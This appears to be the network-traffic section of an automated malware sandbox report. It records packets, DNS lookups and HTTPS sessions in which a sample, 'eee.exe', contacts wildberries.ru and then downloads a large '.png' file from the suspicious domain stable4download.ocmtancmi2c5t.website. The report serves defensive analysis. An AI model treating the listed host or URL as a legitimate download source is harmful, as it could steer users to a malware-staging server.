Sep 26, 2023 09:46:56.916333914 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.916393995 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.916403055 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.916419029 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.916435003 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.918116093 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.918135881 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.918189049 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.918199062 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.918227911 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.920864105 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.920890093 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.920950890 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.920958042 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.920989990 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.922736883 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.922755957 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.922811985 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.922821045 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.922851086 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.925730944 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.925750971 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.925802946 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.925817013 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.925847054 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.927655935 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.927675962 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.927730083 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.927741051 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.927767038 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.927782059 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.929773092 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.929792881 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.929837942 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.929850101 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.929873943 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.929889917 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.933948040 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.933969021 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.934015036 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.934031963 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.934058905 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.934073925 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.936377048 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.936397076 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.936460972 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.936476946 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.936502934 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.936517000 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.939079046 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.939096928 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.939138889 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.939150095 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.939182997 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.939201117 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.016097069 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.016132116 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.016195059 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.016225100 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.016254902 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.016283989 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.018065929 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.018089056 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.018150091 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.018160105 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.018218994 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.020262003 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.020291090 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.020322084 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.020328999 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.020363092 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.020379066 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.022701979 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.022726059 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.022753954 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.022759914 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.022790909 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.022811890 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.025198936 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.025219917 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.025257111 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.025263071 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.025315046 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.025331020 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.027004004 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.027026892 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.027057886 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.027064085 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.027097940 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.028789043 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.028812885 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.028852940 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.028858900 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.028882980 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.028899908 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.031461954 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.031488895 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.031522989 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.031532049 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.031558037 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.031568050 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.031625986 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.033339977 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.033361912 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.033396959 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.033410072 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.033426046 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.033448935 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.037866116 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.037888050 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.037950039 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.037965059 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.038013935 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.043287992 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.043311119 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.043353081 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.043368101 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.043394089 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.043411970 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.044668913 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.044691086 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.044761896 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.044761896 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.044776917 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.044819117 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.046008110 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.046030045 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.046082973 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.046097040 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.046137094 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.046161890 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.048069000 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.048091888 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.048155069 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.048171043 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.048199892 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.048218966 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.050678015 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.050697088 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.050741911 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.050755978 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.050786018 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.050806046 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.054033041 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.054055929 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.054104090 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.054119110 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.054147959 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.054169893 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.055740118 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.055761099 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.055824041 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.055838108 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.055876017 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.056912899 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.056932926 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.057035923 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.057049036 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.057133913 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.060247898 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.060267925 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.060345888 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.060355902 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.060441017 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.061800957 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.061822891 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.061871052 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.061877012 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.061960936 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.061969995 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.062499046 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.062529087 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.062572002 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.062578917 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.062628031 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.062650919 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.062686920 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.065551043 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.400248051 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.400336981 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:57.400376081 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:57.400396109 CEST	443	49766	172.67.157.22	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2023 09:46:52.465703011 CEST	64393	53	192.168.2.8	8.8.8.8
Sep 26, 2023 09:46:52.603168011 CEST	53	64393	8.8.8.8	192.168.2.8
Sep 26, 2023 09:46:53.835308075 CEST	55024	53	192.168.2.8	8.8.8.8
Sep 26, 2023 09:46:54.103833914 CEST	53	55024	8.8.8.8	192.168.2.8
Sep 26, 2023 09:46:55.267833948 CEST	51912	53	192.168.2.8	8.8.8.8
Sep 26, 2023 09:46:55.432512045 CEST	53	51912	8.8.8.8	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2023 09:46:52.465703011 CEST	192.168.2.8	8.8.8.8	0xe115	Standard query (0)	wildberries.ru	A (IP address)	IN (0x0001)	false
Sep 26, 2023 09:46:53.835308075 CEST	192.168.2.8	8.8.8.8	0x23c2	Standard query (0)	www.wildberries.ru	A (IP address)	IN (0x0001)	false
Sep 26, 2023 09:46:55.267833948 CEST	192.168.2.8	8.8.8.8	0xfc72	Standard query (0)	stable4download.ocmtancmi2c5t.website	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 26, 2023 09:46:52.603168011 CEST	8.8.8.8	192.168.2.8	0xe115	No error (0)	wildberries.ru	185.138.252.1	A (IP address)	IN (0x0001)	false
Sep 26, 2023 09:46:52.603168011 CEST	8.8.8.8	192.168.2.8	0xe115	No error (0)	wildberries.ru	185.138.253.1	A (IP address)	IN (0x0001)	false
Sep 26, 2023 09:46:52.603168011 CEST	8.8.8.8	192.168.2.8	0xe115	No error (0)	wildberries.ru	185.138.255.1	A (IP address)	IN (0x0001)	false
Sep 26, 2023 09:46:54.103833914 CEST	8.8.8.8	192.168.2.8	0x23c2	No error (0)	www.wildberries.ru	185.138.252.1	A (IP address)	IN (0x0001)	false
Sep 26, 2023 09:46:54.103833914 CEST	8.8.8.8	192.168.2.8	0x23c2	No error (0)	www.wildberries.ru	185.138.253.1	A (IP address)	IN (0x0001)	false
Sep 26, 2023 09:46:54.103833914 CEST	8.8.8.8	192.168.2.8	0x23c2	No error (0)	www.wildberries.ru	185.138.255.1	A (IP address)	IN (0x0001)	false
Sep 26, 2023 09:46:55.432512045 CEST	8.8.8.8	192.168.2.8	0xfc72	No error (0)	stable4download.ocmtancmi2c5t.website	172.67.157.22	A (IP address)	IN (0x0001)	false
Sep 26, 2023 09:46:55.432512045 CEST	8.8.8.8	192.168.2.8	0xfc72	No error (0)	stable4download.ocmtancmi2c5t.website	104.21.65.11	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wildberries.ru

www.wildberries.ru

stable4download.ocmtancmi2c5t.website

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.8	49764	185.138.252.1	443	C:\Users\user\Desktop\eee.exe

Timestamp	Direction	Data
2023-09-26 07:46:53 UTC	OUT	GET /update2/update.json HTTP/1.1 Connection: Keep-Alive Host: wildberries.ru
2023-09-26 07:46:53 UTC	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 26 Sep 2023 07:46:53 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.wildberries.ru/update2/update.json Status-NO-Id: ngx-site-r04-01.dp
2023-09-26 07:46:53 UTC	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.8	49765	185.138.252.1	443	C:\Users\user\Desktop\eee.exe

Timestamp	Direction	Data
2023-09-26 07:46:54 UTC	OUT	GET /update2/update.json HTTP/1.1 Connection: Keep-Alive Host: www.wildberries.ru
2023-09-26 07:46:55 UTC	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 26 Sep 2023 07:46:55 GMT Content-Type: application/json; charset=utf-8 Content-Length: 64 Connection: close Strict-Transport-Security: max-age=15724800; includeSubDomains Status-NO-Id: ngx-site-r07-01.dp
2023-09-26 07:46:55 UTC	IN	Data Raw: 7b 22 73 74 61 74 65 22 3a 2d 31 2c 22 64 61 74 61 22 3a 7b 22 65 72 72 6f 72 4d 73 67 22 3a 22 d0 9d d0 b5 d0 b2 d0 b5 d1 80 d0 bd d1 8b d0 b9 20 d0 b7 d0 b0 d0 bf d1 80 d0 be d1 81 22 7d 7d Data Ascii: {"state":-1,"data":{"errorMsg":" "}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.8	49766	172.67.157.22	443	C:\Users\user\Desktop\eee.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-26 07:46:55 UTC	0	OUT	GET /httpbin/1370699322.png HTTP/1.1 Connection: Keep-Alive Host: stable4download.ocmtancmi2c5t.website
2023-09-26 07:46:56 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 26 Sep 2023 07:46:56 GMT Content-Type: image/png Content-Length: 928993 Connection: close Last-Modified: Mon, 25 Sep 2023 17:33:44 GMT ETag: "e2ce1-606325c2d887a" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DnEuOuHYVxvJWaeFyVRYXfNXMbn74CuPRQTIOXHTxwru3zDDrX2UbDDdOlLOgsbpRgSaqTxN0F0h4gH2I133ovFbi%2FUU%2FNQACqDrhztrefHIAA1FxWoTCpXR8qJ6wRJQLoDjBaI5%2F9dNgdGeNfLjPEjJuLveVPSO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80c9e55b89c73347-MIA alt-svc: h3=":443"; ma=86400
2023-09-26 07:46:56 UTC	1	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 74 00 00 03 74 08 06 00 00 00 fc 90 6a bb 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 00 48 00 00 00 48 00 46 c9 6b 3e 00 00 80 00 49 44 41 54 78 da ec fd db 9a e4 3a 72 25 08 9b 81 f4 88 cc 52 ab 55 52 eb d0 f3 5f cc fb 3f d7 5c cc 48 aa 92 aa aa bb 55 19 e1 4e c0 fe 0b c0 60 07 00 24 dd 23 22 33 72 27 ec db b9 c3 9d c4 99 70 10 0b cb 0e 08 53 a6 4c 99 32 65 4a 91 ff ef 3f bf 01 00 60 fe 1f 02 00 00 62 93 8c fe e5 ef bf 7c 97 f6 fc c7 ff 7a ad ed 21 2a 95 13 01 a9 ef 2c 9d 76 ee 4a 2f 3f 02 00 62 d3 6f fa 1f ff fd f9 bb f4 f7 df fe f4 52 fb eb db 99 7b 9d 3f fe 5f ff f0 f5 bb b4 67 ca 94 29 53 a6 7c 7e b9 f3 f5 37 65 ca 94 29 53 7e 06 f9 f7 3f bf 98 ef ff fc Data Ascii: PNGIHDRttjbKGDpHYsHHFk>IDATx:r%RUR_?\HUN`$#"3r'pSL2eJ?`b\|z!*,vJ/?boR{?_g)S\|~7e)S~?
2023-09-26 07:46:56 UTC	2	IN	Data Raw: 84 d3 f6 6e ca 94 29 53 3e b1 4c 86 6e ca 94 29 53 3e bf 3c 04 59 c6 0c 93 2b 7c c7 34 0b 55 7e 0f 7c c6 b6 5e a3 f6 dc c7 e4 1d 0e ca 3b 1d 49 9e 29 c7 0e 25 f5 ef 3b 40 77 cf d8 f4 da 71 f6 b9 48 1b 34 ad 09 4d 5b f0 c8 b8 f0 44 f7 a7 4c 99 32 65 ca e7 93 09 e8 a6 4c 99 32 e5 3b 48 71 47 0f 00 16 18 ed 79 7f 24 02 88 89 0c b3 53 37 e7 ae fc 3d 50 d2 6c ec 3b 79 8e 76 fa be fe 47 c5 94 43 c7 e5 69 46 6f 78 ff 0d ed 3a ca 7f b6 9d 4d 9e 37 ca 19 bb 3e 5f 17 69 56 f3 44 23 10 c7 ec ac ae 1f 11 e1 4f ff fb 6a e6 e5 9e 37 4f 3d af be 57 78 8b 29 53 a6 4c f9 95 65 02 ba 29 53 a6 4c f9 7e 72 37 43 12 10 21 95 cf ca 6d 7d 5b 70 d7 e1 c9 c8 a6 0b 4d 3e 84 23 97 fc de eb 25 f5 6f 0f 4c b9 c6 76 65 34 04 54 fa 3a 02 e6 bf 55 75 53 52 a1 29 e0 5e 28 d5 cf 2f 2a 92 Data Ascii: n)S>Ln)S><Y+\|4U~\|^;I)%;@wqH4M[DL2eL2;HqGy$S7=Pl;yvGCiFox:M7>_iVD#Oj7O=Wx)SLe)SL~r7C!m}[pM>#%oLve4T:UuSR)^(/*
2023-09-26 07:46:56 UTC	3	IN	Data Raw: 1a 85 61 3b 70 3f fd c0 fb e3 5b 65 e4 cd 93 5b d4 ce 13 bc ab bc ef 28 d2 c2 fb 02 ad 9f 4c 49 d5 71 0f ee 8e c3 7d 2e 73 ee fd 9d 8d e6 cf 8c 7b 37 65 ca 94 5f 55 26 a0 9b 32 65 ca 6f 4f 28 fb 7b 30 6a 8d ad c7 f4 cf 21 3d e3 a0 47 3d 85 fc 06 e5 8c ed e1 47 d6 ab 19 a4 5f 52 fc fc 1c 29 39 7e 92 f9 e9 bd 6a 36 fe 86 7e d9 07 39 65 ca 94 df b2 4c 40 37 65 ca 94 9f 52 b0 0b 7a d4 11 fd c8 2b 1f 99 e4 f6 d6 60 b3 77 9e e9 60 ab 34 d9 e5 ee 11 6d 7d e7 90 64 72 70 24 83 61 85 77 c8 11 23 f9 d1 e2 eb 3d 6e c7 db 29 97 37 b6 d8 3d bf fd 89 70 3e 5e dc c7 ca 03 f5 ee 52 6a d4 85 71 ad 5a 63 f7 79 a2 7e 8a fb b6 87 f7 b6 7b fc fb ed 7b 8d e5 cf d5 a6 b5 3e b0 bb c7 6b ca 94 29 53 3e 95 4c 40 37 65 ca 94 9f 52 70 f8 25 4b 0d e8 ad f6 92 47 fb b6 f7 62 62 b0 f3 Data Ascii: a;p?[e[(LIq}.s{7e_U&2eoO({0j!=G=G_R)9~j6~9eL@7eRz+`w`4m}drp$aw#=n)7=p>^RjqZcy~{{>k)S>L@7eRp%KGbb
2023-09-26 07:46:56 UTC	4	IN	Data Raw: d8 67 f4 a6 4c 99 32 e5 a3 64 02 ba 29 53 a6 bc 8b fc db 9f b4 57 cb fb f3 ef d9 f2 bc c5 76 cb 37 45 d4 00 7f ac 9c 8e ed f5 86 31 78 48 86 0e 4d 4e 74 e8 33 0c ec cf 22 27 bc 32 0e 01 e1 77 a4 c2 ee b1 d1 fc 0c 8f 9f 11 6a e3 50 e9 c1 f6 8d 7e a7 8f fe 2e ff f5 3f 5f cc 6f e9 5f fe 7e 7a bd 9c 32 65 ca db 65 02 ba 29 53 a6 bc a7 98 fd cd 38 0e 99 b3 dd 52 3b 26 52 a5 0c bd 2a aa 13 77 2b d6 56 49 6c ee d4 05 9d fa 54 ac aa 0f 1c 27 eb 8c 6f d7 b6 2f 33 05 ef db a0 1d 1b 27 ec 39 de 78 4b 5c 39 33 d6 b4 73 4f 95 f8 a3 bc 80 0e 07 a5 8d 5b 66 c7 85 a7 f3 49 17 fa dc 53 51 0d 6c 99 e3 c1 98 bb a8 6b ec cd f1 6d f3 c3 3f 07 3f fe bd 29 31 b8 fe a6 07 77 ef ef 4e b5 1b 5d 19 d4 1b 97 f3 eb c7 60 3c 0e d6 ab d1 b8 75 6c 43 3f d7 04 9f 32 65 ca 4f 2b 13 d0 4d Data Ascii: gL2d)SWv7E1xHMNt3"'2wjP~.?_o_~z2ee)S8R;&R*w+VIlT'o/3'9xK\93sO[fISQlkm??)1wN]`<ulC?2eO+M
